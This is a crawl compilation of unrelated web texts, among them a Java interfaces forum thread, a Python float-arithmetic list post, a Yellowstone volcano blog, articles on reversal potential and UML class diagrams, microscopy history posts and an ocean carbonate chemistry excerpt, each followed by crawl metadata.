Web design and development can be as easy as using a template to build a web site or it can be a refined skill for professionals. In this section, learn more about design, animation, web servers, domain names and more. As powerful as computers are, they have difficulty listening to and understanding the people who use them every day. How does Google attempt to enable accurate speech recognition within its product line? When you type a URL into your Web browser's address bar, the correct page appears as if by magic (provided you typed it correctly). Is it the work of sorcery? Nope! Domain name servers are handling all the data behind the scenes. Among Google's goals is a project to scan books and make them available to anyone with access to the Internet. The idea is to spread knowledge, so why are so many people upset with the company's method for going through with the project? Often, the Web site you see on your smartphone is quite different from the version you see on your computer screen. How do Web servers know you're using a mobile device, and how are pared-down mobile pages designed?
<urn:uuid:dba4d077-4323-4108-8326-44e27ab0a1ba>
2.90625
239
Content Listing
Software Dev.
52.821902
Correct usage/method of Java Interfaces I really don't know if this is the right place to post this question; I hope my question, though fundamental, may not be that basic. My question is: Java interfaces - what is the proper way of using them? Conceptually, everybody I spoke to says they support multiple inheritance. And they just define methods, leaving the functionality (behavior) of the methods up to the class that implements them. But although every word of this argument is true, I have also noticed that interfaces are also used to flag. Meaning, certain functionality of a particular class is only available if a specific interface (or interfaces) is implemented. Servlets are good examples. So a servlet cannot be a servlet unless a particular interface is implemented. Now the point is that, if I have to put the same behaviour in my own program, can I do it? Or is this flagging built into the JVM? Can I make, in three different packages, 1) package1: Interface myInterface, 2) package2: a class class1 with a main method, 3) package3: another class class2 whose functionality is available to class1 only when interface myInterface is implemented by class1 - in such a way that when I try using class2 in class1 without implementing myInterface, the compiler gives me a message? I hope I was able to explain myself. Maybe I'm just not thinking hard enough... the solution is just around the corner. Regards to all. It seems to me that you need to disconnect your tie between inheritance and Java Interfaces. An Interface tells an outsider that the class which implements the interface will have methods with a particular signature. The Interface itself does not implement any such methods - it is left to the classes which implement the interface to implement these methods. So there are no implementations which are "inherited" - we just know that if you pass an appropriately formatted message to an object which implements a particular interface, and the message is a properly structured call to a method exposed by the interface, your object will know what you want to do and will perform the appropriate behavior based on that message. Any object which implements an Interface can be addressed by that Interface - similar to the way that an object of a derived class can still be called as an object of the parent class. So, any object implementing the Map Interface can be referred to as a Map object, and likewise any Comparable or Iterable or Runnable, etc. Where an Interface must be implemented, such as your reference to a "servlet", the "contract" between a calling and a called object requires that the called object must implement the methods whose signatures appear in the Servlet Interface. The calling object does not care how you choose to implement those methods - its methods which are making calls to the "servlet" just know that they need to format their calls in a particular way and that they will be receiving some response to the call, or that they know that some required behavior will be performed. Interfaces do not require the extra storage, reference space, and overhead that class inheritance requires. With this in mind, could you restate the relationship you are looking for among your interface, class1 and class2? Do you have any particular implementation you are thinking about (more specific)? Last edited by nspils; 01-01-2006 at 03:10 PM. Thanx for detailing your reply. Well, I was actually looking for details on marker interfaces and their implementation (if I have to do it on my own!).
I only came to know about this MI behavior recently. Interfaces have been a topic of debate between me and my friends as to what possible usages of interfaces exist. Well, you are correct in saying that by implementing interfaces one can use the dynamic dispatch feature to its fullest. I am doing more reading on contract-oriented programming. Thanks for stopping by. As you have probably realized, marker interfaces are a different breed. A marker interface is more of a "declared attribute" - metadata - informing the user that this class has a characteristic, rather than a set of declared methods which need to be implemented. There are threads in the java.sun developer forums which address the writing of one's own marker interface.
<urn:uuid:c5ec55a8-ac3d-4709-9a18-296381d9facb>
3.015625
1,133
Comment Section
Software Dev.
51.793082
How about adding rational fraction to Python? Sun Mar 2 17:36:28 CET 2008 Lie <Lie.1296 at gmail.com> writes: > You hit the right note, but what I meant is the numeric type > unification would make it _appear_ to consist of a single numeric type > (yeah, I know it isn't actually, but what appears from outside isn't > always what's inside). That is clearly not intended; floats and decimals and integers are really different from each other and Python has to treat them distinctly. > > Try with a=7, b=25 > They should still compare true, but they don't. The reason why they > don't is because of float's finite precision, which is not exactly > what we're talking here since it doesn't change the fact that > multiplication and division are inverse of each other. What? Obviously they are not exact inverses for floats, as that test shows. They would be inverses for mathematical reals or rationals, but Python does not have those. > One way to handle this situation is to do an epsilon aware > comparison (as should be done with any comparison involving floats), > but I don't do it cause my intention is to clarify the real problem > that multiplication is indeed inverse of division and I want to > avoid obscuring that with the epsilon comparison. I think you are a bit confused. That epsilon aware comparison thing acknowledges that floats only approximate the behavior of mathematical reals. When we do float arithmetic, we accept that "equal" often really only means "approximately equal". But when we do integer arithmetic, we do not expect or accept equality as being approximate. Integer equality means equal, not approximately equal. That is why int and float arithmetic cannot work the same way.
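The float behavior under discussion is easy to reproduce; here is a minimal sketch (a and b as in the thread; the fractions module shows the exact-rational contrast the reply describes):

```python
from fractions import Fraction

a, b = 7.0, 25.0

# b/a is not exactly representable in binary floating point, so
# multiplying back does not necessarily return b; the thread reports
# this comparison failing for these values.
print(a * (b / a) == b)

# An epsilon-aware comparison accepts "approximately equal":
epsilon = 1e-9
print(abs(a * (b / a) - b) < epsilon)   # True

# Exact rational arithmetic makes multiplication and division
# true inverses again:
a, b = Fraction(7), Fraction(25)
print(a * (b / a) == b)                 # True
```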
<urn:uuid:eadc77b9-e7eb-4220-8dde-dedfff608182>
2.703125
414
Comment Section
Software Dev.
52.099188
I am not a geologist, although I did go to school and did take geology classes, but that was years ago and is not the real subject of this post. The real subject is the fact that we have a supervolcano smack dab in the middle of the United States and nobody seems to be talking about, or considering, the risk it poses. Yellowstone National Park is one big volcanic nightmare ready to erupt. I am not saying that an eruption is imminent, but it is coming. When it goes, it has the potential to be the biggest natural disaster of our time, making Mount Saint Helens look like a joke. Have you ever seen pictures on TV or in movies, or maybe you have been there, and watched Old Faithful or the countless other geysers erupt in jets of steam? All of this, and all of the hot pools and sulfur-smelling bubbling water, is caused by the heating of the area by magma that is as shallow as 5 miles deep under the surface. The entire region is a volcanic hot spot that has erupted throughout history. The last time? 640,000 years ago. The time before that: 1.3 million years ago; the time before that, 2.1 million years ago. Do the math: the volcano goes off historically around every 600,000 – 750,000 years, give or take a few hundred thousand years. Is it significant that we are due for another eruption? Maybe in our lifespan? The facts are simple. The ground is uplifting around 23 centimeters each year. This is caused by rising magma forcing the crust to lift. Earthquakes are swarming - 77 of them in the month of June of this year (which is not uncommon). Geysers that have been dormant for years are coming to life again, and those that have been active are starting to change their schedule. All of these are signs that, geologically, the area is becoming more unstable. So what happens when this big supervolcano erupts? Ash is going to travel for hundreds of miles, the ecological system of the area is going to be changed for a very long time, and it has the potential to destroy a ton of life. Check out this report. I am not worried about an eruption of the Yellowstone caldera, but I just think the subject is really cool. The geologic processes are amazing, and in a state of flux. Look at the picture at the top of this post to see the swarm increase in the number of earthquakes over the last 30-50 years. See the increase…whooa baby. (The picture was taken without permission of the author of the report linked above.) Another great Yellowstone Volcano FAQ can be found here
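The post's "do the math" step can be checked directly; a quick sketch using the three eruption dates quoted above:

```python
# Eruption dates quoted in the post, in millions of years ago (Mya)
eruptions_mya = [2.1, 1.3, 0.64]

# Gaps between successive eruptions
intervals = [round(older - newer, 2)
             for older, newer in zip(eruptions_mya, eruptions_mya[1:])]
print(intervals)   # [0.8, 0.66] -> roughly 800,000 and 660,000 years
print(f"time since the last eruption: {eruptions_mya[-1]} million years")
```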
<urn:uuid:1ea76be6-d2d0-408e-878e-3756b49fdab5>
2.828125
553
Personal Blog
Science & Tech.
63.916538
NASA eClips: Aurora: Why they exist and what causes them This NASA video segment explores the phenomenon of the polar aurora, called the Northern Lights (Aurora Borealis) in the Northern Hemisphere. Scientists have been investigating them for nearly 200 years. With the help of satellite measurements we now have a very detailed understanding of what they are and how they are produced. This video will introduce the THEMIS satellite constellation, launched in 2007. Its five satellites were placed in specific orbits to track the events that lead from the arrival of a solar storm to the first glimpses of the Northern Lights. Related Mathematics Problems These problems provide a mathematical introduction to some of the issues related to solar activity and space weather. Problem 11: The Height of an Aurora Students use simple geometry to deduce the height of an aurora above ground [Download PDF] Problem 22: The North and South Magnetic Poles Students use satellite images of the polar aurora to determine the location of the north and south magnetic poles. [Download PDF]
<urn:uuid:407b2a3f-1c17-4ef9-80e1-6ba0a0db029c>
4.03125
212
Content Listing
Science & Tech.
26.189655
The reversal potential (also known as the Nernst potential) of an ion is the potential of the cell membrane at which there is no net (overall) flow of that ion from one side of the membrane to the other. It defines the negative resting potential of neurons, muscle cells and other excitable cells when the cell is quiescent (not excited). In these cells the resting potential is created by the selective membrane permeability to K+. In a single-ion system, the reversal potential is also the equilibrium potential (the numerical values are identical). "Equilibrium" means that at this voltage, both outward and inward rates of ion movement are the same; the ion flux is in equilibrium. Ions may still move, but the net current is zero. "Reversal" means that a change of membrane potential on either side of the equilibrium potential reverses the overall direction of ion flux. However, multi-ion systems may be in a state where the summed currents of the multiple ions equal zero. While this is a reversal potential in the sense that the membrane current reverses direction, it is not an equilibrium potential, because some (frequently all) of the ions are not in equilibrium and thus have net fluxes across the membrane. When a cell has significant permeabilities to more than one ion, the Nernst equation is not suitable and the Goldman-Hodgkin-Katz equation is required to calculate the potential. The fact that the reversal potential for a particular membrane matches the equilibrium potential for a particular ion is experimental proof that this membrane contains channels that are specific for that ion. The membrane itself has little permeability for charged particles. Hence most of the ion flow across it is caused by the presence of specialized proteins, ion channels. These channels are often highly specific to one type of ion (K+, Na+, etc.). When a channel type that is selective to one species of ion dominates (because other ion channels are closed, for example), the voltage inside the cell will equilibrate (i.e. become equal) to the reversal potential for that ion (assuming 0 outside the cell). For most cells, potassium conductance dominates during the resting stage, and so the resting potential is close to the K+ (potassium ion) reversal potential. During a typical action potential, a large number of Na+ channels open, bringing the membrane potential close to the reversal potential of Na+. The reversal potential can be calculated from the Nernst equation (so it is also called the Nernst potential). The term driving force is related to the equilibrium potential, and is likewise useful in understanding the current in biological membranes. Driving force refers to the difference between an ion's equilibrium potential and the actual membrane potential. It is defined by the following equation: I_ion = g_ion (V_m - E_ion). In words, this equation says that the ionic current I_ion is equal to that ion's conductance g_ion multiplied by the driving force, the difference between the membrane potential V_m and the ion's equilibrium potential E_ion. The ionic current will always be zero if the membrane is impermeable (g_ion = 0) to the ion in question. The probability that an ion takes a state of energy E is proportional to the Boltzmann factor exp(-E/kT), where T is the temperature and k is the Boltzmann constant. This energy at location x is equal to E = q φ(x), where φ(x) is the electric potential at location x. Hence the probability to find an ion somewhere around x is proportional to exp(-q φ(x)/kT), where q is the charge of the ion. The number of ions is sufficiently huge to interpret this probability as the actual density.
Now let's assume that positions x1 and x2 are on the opposite surfaces of the membrane, right across the lipid layer. For positively charged ions, the ion density ratio between points x1 and x2 is n1/n2 = exp(-q(φ1 - φ2)/kT). The difference of electric potentials over the two positions, φ1 - φ2, is the quantity we need to find. From the expression above it is φ1 - φ2 = (kT/q) ln(n2/n1), where n1 and n2 are the molar concentrations of the ion on the two sides of the membrane. For a resting cell with the usual inner (about 400 mmol/l) and outer (about 20 mmol/l) concentrations of K+, the resting potential is about -77 mV. As the higher K+ concentration is inside, the cell is negatively charged. The computed potential does not depend on the membrane permeability (as long as it is non-zero). The formula assumes that the volumes inside and outside are big enough not to impact the concentrations during formation of the potential (close to the truth for most living cells). Some sources referenced in the literature list express this equation through the Avogadro constant N_A (the number of ions in one mole), the Faraday constant (F = N_A q, about 96,485 C/mol for monovalent ions) and the universal gas constant (R = N_A k, about 8.314 J/(mol K)). From here, E = (RT/zF) ln(n_out/n_in), where z is the valence of the ion. Some ion transporters transfer multiple ions and uncharged molecules during their operating cycle. For instance, a sodium pump may transfer 3 Na+ ions outside and 2 K+ ions inside the cell. If the total electric charge of all transferred ions remains non-zero, a membrane where such a transporter is dominant still has a reversal potential. When a transporter transfers x Na+ ions outside in exchange for y K+ ions inside and uses no additional energy, the formula for the reversal potential can be derived (B. Chapman 1978) as V_rev = (RT/((x - y)F)) ln( ([Na+]_out/[Na+]_in)^x ([K+]_in/[K+]_out)^y ). From this formula it is obvious that the reversal potential is only defined when x ≠ y. Transferring an equal number of ions of the same valence in opposite directions has no impact on an existing reversal potential, if any. A transporter can also couple transport of charged ions with the transport of neutral molecules. In such a case the chemical gradient of these "passenger molecules" also has an impact on the reversal potential. For instance, the GABA transporter co-translocates a neutral molecule of γ-aminobutyric acid (GABA), two Na+ ions and one Cl- ion across the plasma membrane during a single cycle of operation. The reversal potential can then be computed from V_rev = (RT/((2 - 1)F)) ln( ([GABA]_out [Na+]_out^2 [Cl-]_out) / ([GABA]_in [Na+]_in^2 [Cl-]_in) ). Here 2 - 1 means 2 z_Na - z_Cl, where z_Na is the valence of Na+ and z_Cl is the valence of Cl- (both equal to one). A reversal potential can also be computed for a membrane that contains active ion transporters. Such transporters convert between chemical energy (usually ATP) and the energy of the ion electrochemical gradient, but they can convert in both directions. At the reversal potential, not only are the ion currents balanced but the ATP synthesis rate is also equal to the ATP breakdown rate. The calculated potential depends on the free energy of the ATP breakdown. It also depends on how many ions are transferred in each direction while breaking or synthesizing a single ATP molecule. B. Chapman (1978) extends the formula for the K+/Na+ antiporter to the usual case when this transporter also breaks an ATP molecule during its cycle (3 Na+ out and 2 K+ in per ATP): V_rev = (1/F)(3RT ln([Na+]_out/[Na+]_in) + 2RT ln([K+]_in/[K+]_out) - A), where A is the free energy of the ATP breakdown. The formula has also been used to determine this energy under physiological conditions.
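As a worked example, here is a small sketch (not part of the article) that evaluates the Nernst formula for the K+ concentrations quoted above; the temperature is an assumption (298 K here, which reproduces the -77 mV figure; body temperature shifts the result by a few millivolts):

```python
import math

R = 8.314     # J/(mol*K), universal gas constant
F = 96485.0   # C/mol, Faraday constant

def nernst_mV(c_out_mM, c_in_mM, z=1, T=298.0):
    """Reversal (Nernst) potential in millivolts, inside relative to outside."""
    return 1000.0 * (R * T) / (z * F) * math.log(c_out_mM / c_in_mM)

# K+ with ~400 mmol/l inside and ~20 mmol/l outside:
print(round(nernst_mV(20.0, 400.0), 1))   # about -76.9 mV, i.e. roughly -77 mV
```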
<urn:uuid:54064140-01e5-4a2c-b2fb-b1578db73766>
3.546875
1,401
Knowledge Article
Science & Tech.
38.171556
Elliotte Rusty Harold continues his coverage of VML in this second of two parts. This part includes coverage of how to position VML shapes with CSS properties. More articles by Elliotte Harold Microsoft's Vector Markup Language (VML) is an XML application for vector graphics that can be embedded in Web pages in place of the bitmapped GIF and JPEG images loaded by HTML's IMG element. Vector graphics take up less space and thus di Since XML is more powerful than HTML, you might think that you need to learn even more elements, but you don't. XML gets its power through simplicity and extensibility, not through a plethora of elements. Well-formed XML is critical in order to maintain the accuracy of your information. Elliotte Rusty Harold presents guidelines for creating well-formed XML. Real-world Web pages are extremely sloppy. Well-formed HTML is HTML that adheres to XML's well-formedness constraints but only uses standard HTML tags. Well-formed HTML is easier to read than the sloppy HTML most humans and WYSIWYG tools such as FrontPage write. Elliotte Rusty Harold presents guidelines for creating well-formed HTML.
<urn:uuid:171986ab-6d6b-4d26-832e-35bf1ab2247e>
2.84375
242
Content Listing
Software Dev.
55.454783
Narrow the scope of your process to individual elements (designed with Class Diagrams). Add other diagrams where they help you understand the system. Repeat Steps 1 through 4 as appropriate for the current scope. In this step, you’ll narrow your scope to look at a single component (as identified in Step 4). By zooming in to the scope of the component, you can apply the same analysis and design processes to determine the structure of the component. You’ll begin by playing “Interface Hangman”: treating the interfaces to a component as actors from the perspective of the component, as shown in Figure 2-32. If you’re confused about this step, consider this definition of an actor: Well, in this step, you narrow your scope so that the only “system” of interest is one particular component (at a time). And “outside” that component lie any actors that interact with it and any other components that interact with it. These all meet the definition of “actors” now that you’ve narrowed your scope; however, one rule for interfaces is that they define everything that is known about the connections between components, both for the source component and for the client component. Thus, from the perspective of the current component, the interfaces and user interfaces that it realizes are all that you know about the actors that make requests of it; and the interfaces on which it depends are all that you know about the actors that provide services to it. So it will have actors that represent the users of any user interfaces it provides; but you’ll also create “component actors” that represent the interfaces related to the current component. (Despite Figure 2-32—which is drawn only to convey the idea of interfaces as actors, not as an example you should follow—you may want to use interface icons to represent these component actors, rather than actor icons. This will emphasize that these are interfaces, not people.) If the interfaces are component actors, then the methods of interfaces realized by the current component may be treated as component use cases. Again, consider this definition of a use case: So if a use case represents behavior required by an actor, then a component actor’s requirements—and thus its component use cases—are defined by the operations of the interface it represents. No other requirements are possible, because the interface completely defines how the component and its client may interact. The only other requirements are those of the end user actors who make use of the component’s user interfaces. So in this step of Five-Step UML, you’ll perform the following substeps: The only particularly new elements in this step are those related to Class Diagrams: classes, associations, and dependencies. A class represents the operations and attributes of one or more objects within your system. It binds attributes and operations to completely define the behavior of the objects. Thus a class definition serves the same purpose for an object that an interface definition serves for a component: it describes the ways in which client elements may use the given element. In a Class Diagram, a class appears as a rectangle broken into three sections. The top section identifies the name of the class, the middle lists the attributes of the class, and the bottom section lists the operations of the class. If it makes the diagram less cluttered and thus more clear, you may hide the attributes or operations for any class in the diagram. You may even hide some of the attributes and operations, while showing others. 
But I usually discourage this—unless the class definition is really large and overwhelms the rest of the diagram—because readers tend to assume that a partial list is a full list. Classes: A .NET Perspective Now you’re moving from domain classes to code classes. You need to consider the precise .NET mechanisms for implementing each class. What is its base class? What are its attributes, including types and initial values? What are its operations, including parameters and return types? What kind of class is it: a class, a structure, an enumeration, a delegate? An association represents an object of one class making use of an object of another class. It is indicated simply by a solid line connecting the two class icons. An association indicates a persistent, identifiable connection between two classes. If class A is associated with class B, that means that given an object of class A, you can always find an object of class B, or you can find that no B object has been assigned to the association yet. But in either case, there is always an identifiable path from A to B. Class A uses the services of class B or vice versa. Associations: A .NET Perspective In .NET code, an association is most probably implemented as one class containing another—or to be more precise, containing a reference to the other, since all .NET classes other than structures are always contained by reference. For some designs, each class might contain a reference to the other. These concepts are discussed further in Chapter 4. In Class Diagrams, a dependence represents an object of one class making use of or somehow “knowing about” an object of another class; but unlike association, dependence is a transitory relationship. If class X is dependent on class Y, then there is no particular Y object associated with an X object; but if the X object “finds” a Y object—perhaps it is passed as a parameter, or it receives one as the return from an operation that it calls, or it accesses some globally accessible Y object, or it creates one when it needs one—then it knows what it can do with the Y object. Object X is potentially affected by a change in Object Y. As in other diagrams, dependence is indicated by a dashed arrow connecting the two class icons. Dependence: A .NET Perspective In .NET code, dependence has become almost a nonentity. In old C++ code, for example, dependence could be implemented as one class #include’ing the header file for another class. That #include statement indicated that the first class knew what to do with the second class. But in .NET, most classes are visible to other classes. The closest things to dependence in .NET are But both of these uses are package specific, or perhaps component specific. You may choose to avoid dependence for this reason; but I still prefer to model dependence among classes, because it indicates that one class may create or otherwise manipulate objects of another class. Given these elements, then, a Class Diagram depicts classes and associations between them. Figure 2-33 is a Class Diagram that depicts the classes and associations that may be useful in the Kennel Management System. Classes: A (Further) .NET Perspective The .NET Framework contains over 3,300 classes for common infrastructure operations. Before you design your own classes, you might save time to see if .NET gives you classes that provide the functionality you need, or at least a large chunk of it. TIP: To learn more about Class Diagrams and design, see Chapters 4 and 9.
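Although the chapter's code perspective is .NET, the association/dependence distinction is language-neutral. Here is a minimal sketch in Python (an illustration, not code from the book; the Car, Engine, and Logger classes are hypothetical):

```python
class Engine:
    def start(self) -> None:
        print("engine started")

class Logger:
    def write(self, message: str) -> None:
        print(message)

class Car:
    """Car -> Engine is an ASSOCIATION: a persistent, identifiable link.

    Given a Car object you can always navigate to its Engine, or find
    that none has been assigned yet.
    """
    def __init__(self, engine: Engine) -> None:
        self.engine = engine          # held as a reference

    def drive(self, logger: Logger) -> None:
        """Car -> Logger is a DEPENDENCE: transitory knowledge.

        No particular Logger belongs to the Car; one is merely passed
        in, used, and forgotten -- yet a change to Logger's interface
        could still affect Car.
        """
        self.engine.start()
        logger.write("driving")

Car(Engine()).drive(Logger())
```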
Exercise 205: Define, Refine, Assign, and Design Within Your Components:
<urn:uuid:0494b634-a017-4d5c-9b48-65f0118ccb6b>
3.140625
1,502
Tutorial
Software Dev.
43.729681
Introduction: sun, intensely hot, self-luminous body of gases at the center of the solar system. Its gravitational attraction maintains the planets, comets, and other bodies of the solar system in their orbits. Sections in this article: The Columbia Electronic Encyclopedia, 6th ed. Copyright © 2012, Columbia University Press. All rights reserved. See more Encyclopedia articles on: Astronomy: General
<urn:uuid:ea5a452a-2da0-4224-98e2-44e37bb0a6d2>
3.15625
85
Knowledge Article
Science & Tech.
21.611368
Science Reference Guides Geosphere-biosphere interactions and climate. Edited by Lennart O. Bengtsson, Claus U. Hammer. New York, Cambridge University Press, 2001. 302 p. Johnson, Douglas L. Land degradation: creation and destruction. 2nd ed. Lanham, Rowman & Littlefield, c2007. 303 p. Includes bibliographical references (p. 273-296). GE140.J64 2007 <SciRR> Kemp, David D. Exploring environmental issues: an integrated approach. London, New York, Routledge, 2004. 444 p. Moran, Emilio F. People and nature: an introduction to human ecological relations. Malden, MA, Blackwell Pub., 2006. 218 p. (Blackwell primers in anthropology, 1) Includes bibliographical references (p. -205) Smil, Vaclav. The earth's biosphere: evolution, dynamics, and change. Cambridge, Mass., MIT Press, c2002. 346 p. See especially Chapter 9, Civilization and the Biosphere, p. 229. Imhoff, Marc L. and others. The consequences of urban land transformation for net primary productivity in the United States. Remote sensing of environment, v. 89, no. 4, 29 February 2004: 434-443. Luck, G.W., and others. Alleviating spatial conflict between people and biodiversity. Proceedings of the National Academy of Sciences, v. 101, no. 1, 2004: 182-186. Ricketts, T. and M. Imhoff. Biodiversity, urban areas, and agriculture: locating priority ecoregions for conservation. Ecology and Society, v. 8, no. 2, 2003. Rosenqvist, A. and others. A review of remote sensing technology in support of the Kyoto Protocol. Environmental science & policy, v. 6, no. 5, October 2003: 441-455. Rosenzweig, M.L., and others. Estimating diversity in unsampled habitats of a biogeographical province. Conservation biology, v. 17, no. 3: 864-874. SELECTED INTERNET RESOURCES Atlas of the Biosphere Center for Sustainability and the Environment University of Wisconsin GLOBIO: Measuring Human Impacts On The Biosphere The GLOBIO (Global Methodology for Mapping Human Impacts on the Biosphere) consortium aims to develop a global model for exploring the impact of environmental change on biodiversity. It is designed to support UNEP's activities relating to environmental assessment and early warning. Land Cover Institute U.S. Geological Survey LCI addresses land cover topics from local to global scales, and in both domestic and international settings.
<urn:uuid:63d58fe5-6578-45c9-b82d-814dc3013329>
2.828125
616
Content Listing
Science & Tech.
52.318055
In today’s modern era, it’s almost impossible to imagine a time when we didn’t know about microscopic particles and structures; magnification is a fundamental part of everyday life, from a pair of reading glasses to the side mirrors on a car. With the birth of the optical microscope in the 17th century, scientists were able to meticulously document, research, and discover a world of things normally invisible to the naked eye. It seemed as though the wonders of the microscopic were infinite – until the 1930s, when it became clear that optical microscopy wasn’t telling the entire story. There were forces at work that were far too small for even the most powerful lenses to see; at some point, the image simply couldn’t resolve clearly. It seemed as though optical microscopes had been pushed to their furthest possible limits. But how could something be too small for light to see, and how could you possibly examine it? This set of problems was the catalyst for scientists to begin branching out from light-based microscopy. The theoretical framework explaining the limits of light-based magnification was already in place. The issue lay in understanding how light worked, and why it failed at certain magnifications. Visible light is electromagnetic radiation, part of a wide spectrum of rays that stretches from radio waves to X-rays, microwaves, gamma rays, and more. All EM radiation is made of particles called photons, which travel in a wavelength; the speed and frequency of that wave will determine what sort of radiation it is, and how it interacts with various objects. X-rays, for instance, have a wavelength that is too short to bounce off of human flesh, but they do reflect off dense material like bone, allowing the doctor to clearly see your broken wrist. UV radiation can penetrate the skin enough to cause a sunburn, but we can’t see the rays with our eyes. We are able to see objects because visible light bounces off of them and returns to our eyes. When that wavelength encounters an object, like a sample on a slide or the magnifying lenses of a microscope, the interference will cause the wave to spread out and weaken. As the light passes through a smaller and smaller space, it will scatter more and more. This phenomenon is called diffraction, and it is the major limit of optical microscopy: at a certain point, the photons are just too big and clunky to accurately bounce off of the sample and resolve clearly. All of this was proven in 1873, when physicists Hermann von Helmholtz and Ernst Abbe demonstrated that optical resolution was dependent on the wavelength of the light source. They posed the crucial question: what if you could somehow use an illumination source that had a smaller wavelength than light? It was purely theoretical; the existence of electrons wasn’t proven until 1896. But the idea stayed around in various scientific circles; the theory that electrons could travel in a wave was proposed in a 1924 paper, and in 1926 German scientist Hans Busch showed that magnets could be used to direct a stream of electrons in a specific direction. The problems were in place and the theories were quickly being proven: it wouldn’t be long before scientists broke through the limits of light and found a way to see the invisible all over again. We’re surrounded by an abundance of technology nowadays, so it can sometimes be hard to imagine what it was like to look through a microscope for the very first time in the 1600s.
Before the invention of the compound (multi-lensed) microscope, people believed that the world was comprised solely of what could be seen with the naked eye; it must have been overwhelming to realize what humanity had been missing! Once optical microscopy took off, scientists could finally get a detailed look at everything from well-known insects to completely new bacteria and understand how the tiny structures of a material affected its behavior. Scientists are well-known for conducting experiments and documenting every detail of their actions. So it’s not surprising that the great analytical minds of the day began to sketch out the details of what they saw under the microscope in order to preserve the images for future reference. These images came to be known as micrographs, and they have evolved alongside the microscope in terms of their level of detail and use of technology. Initially, micrographs were hand-drawn sketches detailing what the observer saw on the slide. One of the first known images made with a microscope was drawn by Francesco Stelluti, who published a sheet of bee anatomy in 1630. Thirty-five years later, scientist Robert Hooke wrote and published Micrographia, the first major book about microscopy. The tome detailed his observations: the eyeball of a fly, a plant cell, insect wings, and a huge fold-out engraving of a louse. Micrographia was a monumental best-seller that also coined the biological term ‘cell’ after Hooke’s famous inspection of a piece of cork. Basic sketches remained an easy method for documenting microscopic images for many years. When photography technology caught up, people would often simply hold a standard camera up to a microscope eyepiece and take a picture; after all, the camera was designed to resemble the viewpoint of a human eye, so it made sense to try to capture the slide permanently by exposing it to film. This technique is called the ‘afocal method’. A typical optical microscope emits parallel light rays from its source up into the ocular, so an image can be created using a camera that is made for capturing very distant objects; those lenses are designed to work with parallel light as well. The eyepieces of both the ocular and the camera must be carefully chosen to work together to capture a clear image. The direct imaging method is far more straightforward: both the eyepiece of the microscope and the lens of the camera are removed, and the camera is placed on the microscope tube so that its shutter surface matches the primary image plane projected by the microscope. You can also purchase mechanical adapters, which attach the camera to the microscope tube directly and allow for a much clearer method of focusing. Digital photography has made micrographs much easier to produce. Modern microscopes may contain a built-in camera and USB connection, which will allow you to plug them into a computer and record images directly onto the hard drive. However, a more flexible approach is to buy a standard microscope and add an external microscope camera. That way, you can use different cameras on the same microscope and vice versa. As important, you do not need to buy an entirely new unit if the camera software fails. Whatever your method, microscope imaging, or photomicrography, has grown and changed alongside microscopy, recording humanity’s findings for future research and posterity.
During my quest to find microscope-related news and content on the Web (it’s a tough challenge sometimes), I came across this blog by way of Boing Boing Gadgets: BibliOdyssey: Early Microscopes. This particular entry shows illustrations of early microscopes dating back to the 1600s culled from various books, including Robert Hooke’s famous Micrographia (1665), Le Microscope à la Portée de Tout le Monde, or The Microscope Made Easy, (Henry Baker, 1742) and Phisicalisch Mikroskopische (Martin Frobenius Ledermüller, 1760s). There are excerpts from the books, too, including this quote by Antonie van Leeuwenhoek about his discovery of bacteria: “They were incredibly small, nay so small, in my sight, that I judged that even if 100 of these very wee animals lay stretched out one against another, they could not reach to the length of a grain of coarse Sand.” Continue reading through the entry and there’s a short history of the microscope, which includes some interesting facts. The first scientific paper relying on microscopy studies was published in 1661. Robert Hooke’s Micrographia was a hit four years later because it showed a mesmerized public the very first illustrations of everyday items as they appeared under a microscope, turning experimental science on its head. Pretty neat stuff, actually. Oh, and the pictures are cool, too.
<urn:uuid:2b2bac14-847c-49ed-85d5-8ce1e7dffe62>
3.984375
1,716
Personal Blog
Science & Tech.
35.985926
(CO2.aq),1 bicarbonate ion (HCO3–), and carbonate ion (CO32–) (see Box 2.1 for definitions). CO2 dissolved in seawater acts as an acid and provides hydrogen ions (H+) to any added base to form bicarbonate: CO2.aq + H2O ⇌ H+ + HCO3– (reaction 1). CO32– acts as a base and takes up H+ from any added acid to also form bicarbonate: CO32– + H+ ⇌ HCO3– (reaction 2). Borate [B(OH)4–] also acts as a base to take up H+ from any acid to form boric acid [B(OH)3]: B(OH)4– + H+ ⇌ B(OH)3 + H2O (reaction 3). As seen in reactions 1 and 2, bicarbonate can act as an acid or a base (i.e., donate or accept hydrogen ions) depending on conditions. Under present-day conditions, these reactions buffer the pH of surface seawater at a slightly basic value of about 8.1 (above the neutral value around 7.0). At this pH, the total dissolved inorganic carbon (DIC ~ 2 mM) consists of approximately 1% CO2, 90% HCO3–, and 9% CO32– (Figure 2.1). The total boric acid concentration [B(OH)4– + B(OH)3] is about 1/5 that of DIC. As discussed in section 2.2, increases in CO2 will increase the H+ concentration, thus decreasing pH; the opposite occurs when CO2 decreases. We note that isotope fractionation between B(OH)3 and B(OH)4– is used for estimating past pH values (Box 2.2). Life in the oceans modifies the amount and forms (or species) of inorganic carbon and hence the acid-base chemistry of seawater. In the sunlit surface layer, phytoplankton convert, or “fix,” CO2 into organic matter during the day—a process also known as photosynthesis or primary production. This process simultaneously decreases DIC and increases the pH. The reverse occurs at night, when a portion of this organic matter is decomposed by a variety of organisms that regenerate CO2, resulting in a daily cycle of pH in surface waters. A fraction of the particulate organic matter sinks below the surface where it is also decomposed, causing vertical variations in the concentrations of inorganic carbon species and pH. The net result is a characteristic maximum in CO2 concentration and minima in pH and CO32– concentration around 500 to 1,000 meters depth. 1 The proper notation for carbon dioxide gas is CO2.g; carbon dioxide dissolved in water is CO2.aq. However, for simplicity, these notations are not carried through the report; the text provides adequate context to determine which form of CO2 is being discussed.
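A small sketch (not from the report) of how such speciation percentages follow from the carbonate equilibria; the dissociation constants pK1 and pK2 below are assumed illustrative seawater values, so the computed split comes out near, but not exactly at, the ~1%/90%/9% quoted in the text:

```python
import math

# Assumed, illustrative seawater dissociation constants; the real
# values vary with temperature, salinity, and pressure.
pK1, pK2 = 5.86, 8.92

def dic_fractions(pH):
    """Fractions of DIC present as CO2, HCO3-, and CO3-- at a given pH."""
    h = 10.0 ** (-pH)
    k1, k2 = 10.0 ** (-pK1), 10.0 ** (-pK2)
    denom = h * h + k1 * h + k1 * k2
    return h * h / denom, k1 * h / denom, k1 * k2 / denom

co2, hco3, co3 = dic_fractions(8.1)
print(f"CO2 {co2:.1%}, HCO3- {hco3:.1%}, CO3-- {co3:.1%}")
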